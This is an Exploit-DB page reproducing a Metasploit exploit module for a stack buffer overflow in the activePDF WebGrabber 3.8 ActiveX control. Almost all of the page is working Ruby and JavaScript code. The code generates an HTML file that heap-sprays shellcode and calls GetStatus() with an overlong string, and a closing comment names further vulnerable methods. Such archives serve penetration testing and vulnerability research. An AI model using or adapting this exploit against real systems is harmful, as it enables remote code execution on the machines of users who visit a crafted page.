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activePDF WebGrabber - ActiveX Control Buffer Overflow (Metasploit)

EDB-ID:

16635

CVE:

EDB Verified: 

Author:

[METASPLOIT](#)

Type:

[REMOTE](#)

Exploit:   / 

Platform:

[WINDOWS](#)

Date:

2010-11-11

Vulnerable App:



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```
##
# $Id: activepdf_webgrabber.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = LowRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'activePDF WebGrabber ActiveX Control
Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in
activePDF WebGrabber 3.8. When
        sending an overly long string to the GetStatus() method of
APWebGrb.ocx (3.8.2.0)
        an attacker may be able to execute arbitrary code. This
control is not marked safe
        for scripting, so choose your attack vector accordingly.
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'MC' ],
      'Version' => '$Revision: 10998 $',
      'References' =>
        [
          [ 'OSVDB', '64579' ],
          [ 'URL',
'http://www.activepdf.com/products/serverproducts/webgrabber/' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => 'true',
        },
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00",
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2
/ IE 7', { 'Ret' => 0x0A0A0A0A } ]
        ],
      'DisclosureDate' => 'Aug 26 2008',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.',
'msf.html' ]),
      ], self.class)
  end
end
```

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```

def exploit
  # Encode the shellcode.
  shellcode = Rex::Text.to_unescape(payload.encoded,
  Rex::Arch.endian(target.arch))

  # Create some nops.
  nops      = Rex::Text.to_unescape(make_nops(4))

  # Set the return.
  ret       = Rex::Text.uri_encode([target.ret].pack('L'))

  # Randomize the javascript variable names.
  vname     = rand_text_alpha(rand(100) + 1)
  var_i     = rand_text_alpha(rand(30)  + 2)
  rand1     = rand_text_alpha(rand(100) + 1)
  rand2     = rand_text_alpha(rand(100) + 1)
  rand3     = rand_text_alpha(rand(100) + 1)
  rand4     = rand_text_alpha(rand(100) + 1)
  rand5     = rand_text_alpha(rand(100) + 1)
  rand6     = rand_text_alpha(rand(100) + 1)
  rand7     = rand_text_alpha(rand(100) + 1)
  rand8     = rand_text_alpha(rand(100) + 1)

  content = %Q|<html>
<head>
<script>
try {
  var #{vname} = new ActiveXObject('APWebGrabber.Object');
  var #{rand1} = unescape("#{shellcode}");
  var #{rand2} = unescape("#{nops}");
  var #{rand3} = 20;
  var #{rand4} = #{rand3} + #{rand1}.length;
  while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
  var #{rand5} = #{rand2}.substring(0,#{rand4});
  var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
  while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #
{rand6} + #{rand5};
  var #{rand7} = new Array();
  for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #
{rand6} + #{rand1} }
  var #{rand8} = "";
  for (#{var_i} = 0; #{var_i} < 800; #{var_i}++){ #{rand8} = #{rand8} +
unescape("#{ret}") }
  #{vname}.GetStatus(#{rand8},1);
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|

  content = Rex::Text.randomize_space(content)

  print_status("Creating '#{datastore['FILENAME']}' file ...")

  file_create(content)
end

end

=begin

Other methods that are vulnerable.

[id(0x00000050), helpstring("Clean up after a WWWPrint call.")]
void CleanUp(BSTR ServerIPAddress, long ServerPort);

[id(0x00000055)]
BSTR Wait(BSTR IPAddress, long PortNumber, short WaitTime, BSTR
AcceptedCommands);

```

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AcceptedCommands);

...and probably more.
=end

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([MSF](#))

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